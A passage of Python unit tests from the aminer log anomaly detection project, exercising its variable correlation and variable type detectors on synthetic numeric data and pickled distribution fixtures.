in ({key: 7}, {key*2: 3, key: 7})) values = [] for i in range(80): stat_data = bytes(str((i % 10) * 1 + offset), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(20): stat_data = bytes(str((i % 10) * 2 + offset), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_w_rel_list def test17init_and_update_timings(self): """This test checks if the init and update intervals are calculated correctly.""" description = 'test17VCD1' t = time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, num_init=self.dataset_size, num_update=self.dataset_size) self.analysis_context.register_component(vcd, description) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement( '/', str((i % 10) * 0.1).encode(), str((i % 10) * 0.1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.receive_atom(log_atom) if i < self.dataset_size - 1: self.assertEqual(vcd.pos_var_cor, []) self.assertEqual(vcd.pos_var_val, []) self.assertEqual(vcd.w_rel_list, []) self.assertEqual(vcd.rel_list, []) # just check if some values were learned and save them to compare. self.assertNotEqual(vcd.pos_var_cor, []) self.assertNotEqual(vcd.pos_var_val, []) self.assertNotEqual(vcd.w_rel_list, []) self.assertNotEqual(vcd.rel_list, []) old_pos_var_cor = deepcopy(vcd.pos_var_cor) old_pos_var_val = deepcopy(vcd.pos_var_val) old_w_rel_list = deepcopy(vcd.w_rel_list) old_rel_list = deepcopy(vcd.rel_list) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 1), 'utf-8') values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement('/', str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.receive_atom(log_atom) if i < self.dataset_size - 1: self.assertEqual(vcd.pos_var_cor, old_pos_var_cor) self.assertEqual(vcd.pos_var_val, old_pos_var_val) self.assertEqual(vcd.w_rel_list, old_w_rel_list) self.assertEqual(vcd.rel_list, old_rel_list) # no new values are expected as num_steps_create_new_rules is -1 by default. self.assertEqual(vcd.pos_var_cor, old_pos_var_cor) self.assertEqual(vcd.pos_var_val, old_pos_var_val) self.assertNotEqual(vcd.w_rel_list, old_w_rel_list) self.assertNotEqual(vcd.rel_list, old_rel_list) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/VariableTypeDetectorTest.py000066400000000000000000001475251437606560100311200ustar00rootroot00000000000000from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.VariableTypeDetector import VariableTypeDetector, convert_to_floats, consists_of_ints, consists_of_floats from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase import time import pickle # skipcq: BAN-B403 import random class VariableTypeDetectorTest(TestBase): """Unittests for the VariableTypeDetector.""" path = "path" def test1convert_to_floats(self): """This unittest tests possible inputs of the convert_to_floats function.""" # use a list full of floats float_list = [11.123, 12.0, 13.55, 12.11] result = convert_to_floats(float_list) self.assertEqual(float_list, result, result) # use a list containing some floats and integers float_int_list = [11.123, 12, 13.55, 12.11, 120] result = convert_to_floats(float_int_list) self.assertEqual([11.123, 12.0, 13.55, 12.11, 120.0], result, result) # use a list of strings with float values string_float_list = ['11.123', '12.0', '13.55', b'12.11'] result = convert_to_floats(string_float_list) self.assertEqual(float_list, result, result) # use a list of strings with values being no floats string_no_float_list = ['11.123', '10:24 AM', '13.55', b'12.11'] result = convert_to_floats(string_no_float_list) self.assertFalse(result) def test2consists_of_ints(self): """This unittest tests possible inputs of the consists_of_ints function.""" # use a list full of integers int_list = [11, 12, 27, 33, 190] self.assertTrue(consists_of_ints(int_list)) # use a list containing integers and floats int_float_list = [11, 12, 27, 33.0, 190] self.assertTrue(consists_of_ints(int_float_list)) # use a list containing integers and floats int_float_list = [11, 12, 27, 33.0, 190.2] self.assertFalse(consists_of_ints(int_float_list)) # use a list with integers as strings string_int_list = ['11', '12', '27', '33', b'190'] self.assertFalse(consists_of_ints(string_int_list)) def test3detect_continuous_shape_fixed_data(self): """ This unittest tests possible continuously distributed variables raising from the detect_continous_shape method. It uses fix data sets. Every distribution has generated 20*100 Datasets and var_ev = 0, var_var = 1. """ # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size = 100 # Significance level significance_niveau = 0.05 # load data with open('unit/data/vtd_data/uni_data_test3', 'rb') as f: [uni_data_list, uni_result_shapes_ks, uni_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test3', 'rb') as f: [nor_data_list, nor_result_shapes_ks, nor_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test3', 'rb') as f: [beta1_data_list, beta1_result_shapes_ks, beta1_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta2_data_test3', 'rb') as f: [beta2_data_list, beta2_result_shapes_ks, beta2_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta3_data_test3', 'rb') as f: [beta3_data_list, beta3_result_shapes_ks, beta3_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta4_data_test3', 'rb') as f: [beta4_data_list, beta4_result_shapes_ks, beta4_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta5_data_test3', 'rb') as f: [beta5_data_list, beta5_result_shapes_ks, beta5_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5, test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test='KS') vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5, test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test='CM') result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(uni_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == 'uni' or 'uni' in [distr[0] for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(uni_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == 'uni' or 'uni' in [distr[0] for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == uni_result_shapes_ks) self.assertTrue(result_list_cm == uni_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(nor_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == 'nor' or 'nor' in [distr[0] for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(nor_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == 'nor' or 'nor' in [distr[0] for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == nor_result_shapes_ks) self.assertTrue(result_list_cm == nor_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta1_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 1) or 'beta1' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta1_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 1) or 'beta1' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta1_result_shapes_ks) self.assertTrue(result_list_cm == beta1_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta2_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 2) or 'beta2' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta2_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 2) or 'beta2' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta2_result_shapes_ks) self.assertTrue(result_list_cm == beta2_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta3_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 3) or 'beta3' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta3_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 3) or 'beta3' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta3_result_shapes_ks) self.assertTrue(result_list_cm == beta3_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta4_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 4) or 'beta4' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta4_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 4) or 'beta4' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta4_result_shapes_ks) self.assertTrue(result_list_cm == beta4_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta5_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 5) or 'beta5' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta5_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == 'beta' and distribution_list[-2] == 5) or 'beta5' in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta5_result_shapes_ks) self.assertTrue(result_list_cm == beta5_result_shapes_cm) def test4detect_var_type(self): """This unittest tests possible scenarios of the detect_var_type method.""" # Load list of an uniformal distributed sample which consists of integers with open('unit/data/vtd_data/uni_data_test4', 'rb') as f: uni_data_list_int = pickle.load(f) # skipcq: BAN-B301 num_init = 100 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS') t = time.time() # test the 'static' path of detect_var_type stat_data = b'5.3.0-55-generic' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # check what happens if less than numMinAppearance values are available for i in range(num_init): self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(['stat', [stat_data.decode()], False], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS') # test ascending with float values for i in range(num_init): stat_data = bytes(str(i * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(['asc', 'float'], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS') # test ascending with integer values for i in range(num_init): stat_data = bytes(str(i), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(['asc', 'int'], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS') # test descending with float values for i in range(num_init, 0, -1): stat_data = bytes(str(i * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(['desc', 'float'], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test='KS') # test descending with integer values for i in range(num_init, 0, -1): stat_data = bytes(str(i), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(['desc', 'int'], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=True, used_gof_test='KS') # test 'num_init' and 'div_thres' values = [] for i in range(num_init): stat_data = bytes(str(uni_data_list_int[i]), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # this means that the uniformal distribution must be detected. self.assertTrue(result[0] == 'uni' or (isinstance(result[-1], list) and 'uni' in [distr[0] for distr in result[-1]]), result) # test 'divThres' option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=1.0, test_gof_int=True, used_gof_test='KS') result = vtd.detect_var_type(0, 0) self.assertEqual(['unq', values], result) # test 'testInt' option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=False, used_gof_test='KS') result = vtd.detect_var_type(0, 0) self.assertEqual(['unq', values], result) # test 'simThres' option to result in 'others' vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.5, used_gof_test='KS') values = [] for i in range(100): stat_data = bytes(str((i % 50) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # at least (1 - 'simThresh') * 'numMinAppearance' and maximal 'numMinAppearance' * 'divThres' - 1 unique values must exist. self.assertEqual(['others', 0], result) # test discrete result vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.3, used_gof_test='KS') values = [] for i in range(num_init): stat_data = bytes(str((i % 50) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) values_set = list(set(values)) values_app = [0 for _ in range(len(values_set))] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] self.assertEqual(['d', values_set, values_app, len(values)], result) def test5consists_of_floats(self): """This unittest tests the consists_of_floats method.""" # test an empty list data_list = [] self.assertTrue(consists_of_floats(data_list)) # test a list of integers and floats data_list = [10, 11.12, 13, 177, 0.5, 0.] self.assertTrue(consists_of_floats(data_list)) # test a list containing a string data_list = [10, 11.12, 13, 177, 0.5, 0., 'dd'] self.assertFalse(consists_of_floats(data_list)) # test a list containing bytes data_list = [10, 11.12, 13, 177, 0.5, 0., b'x'] self.assertFalse(consists_of_floats(data_list)) def test6receive_atom(self): """ This unittest tests if atoms are sorted to the right distribution and if the update steps also work properly. Therefore the assumption that after 200 values the VTD with the default parameters can change to the right distribution. """ # load data with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) # skipcq: BAN-B301 nor_data_list = nor_data_list*10 beta1_data_list = beta1_data_list*10 vtd_arguments = [(50, 30), (75, 50), (100, 50), (100, 75), (100, 100)] for init, update in vtd_arguments: etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> static for i in range(update): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> uni for uni_data in uni_data_list[2*update:4*update]: log_atom = LogAtom(uni_data, ParserMatch(MatchElement(self.path, str(uni_data).encode(), str(uni_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == 'uni' or 'uni' in [distr[0] for distr in pos_distr], (init, update, result)) # uni -> others for i in range(update): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['others', 0], result, (init, update, result)) # others -> d for i in range(update): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=30) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # discrete to others with new values for uni_data in [i / update for i in range(update)]: log_atom = LogAtom(uni_data, ParserMatch(MatchElement(self.path, str(uni_data).encode(), str(uni_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['others', 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=20) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # discrete to others without new values, low num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['others', 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=100) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('d', result[0], (init, update, result)) # discrete to others without new values, high num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertNotEqual(['others', 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> asc for i in range(2*update): stat_data = bytes(str(i * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['asc', 'float'], result, (init, update, result)) # asc -> desc for i in range(2*update, 0, -1): stat_data = bytes(str(i * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['desc', 'float'], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> nor for nor_data in nor_data_list[update:3*update]: log_atom = LogAtom(nor_data, ParserMatch(MatchElement(self.path, str(nor_data).encode(), str(nor_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == 'nor' or 'nor' in [distr[0] for distr in pos_distr], (init, update, result)) # nor -> beta1 for beta1_data in beta1_data_list[:2*update]: log_atom = LogAtom(beta1_data, ParserMatch(MatchElement(self.path, str(beta1_data).encode(), str(beta1_data), None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue((result[0] == 'beta' and result[-1] == 1) or 'beta1' in [distr[0]+str(distr[-1]) for distr in pos_distr], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b'True' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(['stat', [stat_data.decode()], True], result, (init, update, result)) # static -> unq vtd.test_gof_int = False unq_data_list = [bytes(str(i), 'utf-8') for i in range(2*update)] random.shuffle(unq_data_list) for unq_data in unq_data_list: log_atom = LogAtom(unq_data, ParserMatch(MatchElement(self.path, unq_data, unq_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual('unq', result[0], (init, update, result)) def test7update_continuous_VT(self): """ This unittest tests the s_gof_test method. It uses randomised datasets, which can be printed in the terminal. Every distribution has generated 30*300 Datasets and var_ev = 0, var_var = 1. """ # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size_ini = 100 # Size of the update datasample dataset_size_upd = 50 # Significance level significance_niveau = 0.05 # load data with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, uni_result_shapes_ks, uni_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, nor_result_shapes_ks, nor_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, beta1_result_shapes_ks, beta1_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, beta2_result_shapes_ks, beta2_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, beta3_result_shapes_ks, beta3_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, beta4_result_shapes_ks, beta4_result_shapes_cm] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, beta5_result_shapes_ks, beta5_result_shapes_cm] = 